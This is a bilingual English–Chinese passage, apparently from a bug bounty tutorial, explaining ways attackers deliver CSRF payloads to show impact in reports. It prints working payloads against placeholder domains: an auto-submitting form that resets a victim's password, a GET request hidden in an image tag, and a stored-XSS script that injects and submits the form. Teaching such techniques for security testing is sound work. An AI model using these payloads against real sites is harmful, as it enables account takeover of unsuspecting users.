Question

Quite often in bug bounty reports, you’ll need to show companies that attackers can reliably deliver a CSRF payload. What options do attackers have to do so?

在漏洞赏金报告中，有时候你需要向公司展示攻击者可以可靠地提供 CSRF 负载。攻击者有哪些选项可以这样做？

The first and simplest option of delivering a CSRF payload is to trick users into visiting an external malicious site. For example, let’s say example.com has a forum that users frequent. In this case, attackers can post a link like this on the forum to encourage users to visit their page:

交付 CSRF 负载的第一个和最简单的选项是欺骗用户访问一个外部恶意网站。例如，假设 example.com 有一个用户经常访问的论坛。在这种情况下，攻击者可以在论坛上发布像这样的链接，以鼓励用户访问他们的页面:

Visit this page to get a discount on your example.com subscription: https://example.attacker.com

And on example.attacker.com , the attacker can host an auto-submitting form to execute the CSRF:

在 example.attacker.com 这个网站上，攻击者可以托管一个自动提交表单来执行 CSRF 攻击：

<html>
  <form method="POST" action="https://email.example.com/set_password" id="csrf-form">
    <input type="text" name="new_password" value="this_account_is_now_mine">
    <input type='submit' value="Submit">
  </form>
  <script>document.getElementById("csrf-form").submit();</script>
</html>

For CSRFs that you could execute via a GET request, attackers can often embed the request as an image directly—for example, as an image posted to a forum. This way, any user who views the forum page would be affected:

对于可以通过 GET 请求执行的 CSRF 攻击，攻击者通常可以将请求嵌入到像是发布到论坛的图片中。这样，任何查看论坛页面的用户都会受到影响。

<img src="https://email.example.com/set_password?new_password=this_account_is_now_mine">

Finally, attackers can deliver a CSRF payload to a large audience by exploiting stored XSS. If the forum comment field suffers from this vulnerability, an attacker can submit a stored-XSS payload there to make any forum visitor execute the attacker’s malicious script. In the malicious script, the attacker can include code that sends the CSRF payload:

最后，攻击者可以通过利用存储的 XSS 向广大受众传递 CSRF 有效负载。如果论坛评论字段存在此漏洞，攻击者可以在那里提交存储的 XSS 有效负载，使任何论坛访问者执行攻击者的恶意脚本。在恶意脚本中，攻击者可以包含发送 CSRF 有效负载的代码。

<script>
  document.body.innerHTML += "
    <form method="POST" action="https://email.example.com/set_password" id="csrf-form">
      <input type="text" name="new_password" value="this_account_is_now_mine">
      <input type='submit' value="Submit">
    </form>";
  document.getElementById("csrf-form").submit();
</script>

This piece of JavaScript code adds our exploit form to the user’s current page and then auto-submits that form.

这段 JavaScript 代码将我们的漏洞表单添加到用户当前的页面，然后自动提交该表单。

Using these delivery methods, you can show companies how attackers can realistically attack many users and demonstrate the maximum impact of your CSRF vulnerability. If you have Burp Suite Pro, or use the ZAP proxy, you can also take advantage of their CSRF POC-generation functionality. For more information, search the tools’ documentation for CSRF POC generation . You can also keep a POC script you wrote yourself and insert a target site’s URLs into the script every time you test a new target.

使用这些交付方式，您可以向公司展示攻击者如何实际攻击许多用户，并展示您的 CSRF 漏洞的最大影响。如果您有 Burp Suite Pro，或使用 ZAP 代理，您还可以利用它们的 CSRF POC 生成功能。有关更多信息，请搜索工具文档以获取 CSRF POC 生成的信息。您还可以保留自己编写的 POC 脚本，并在每次测试新目标时将目标网站的 URL 插入脚本中。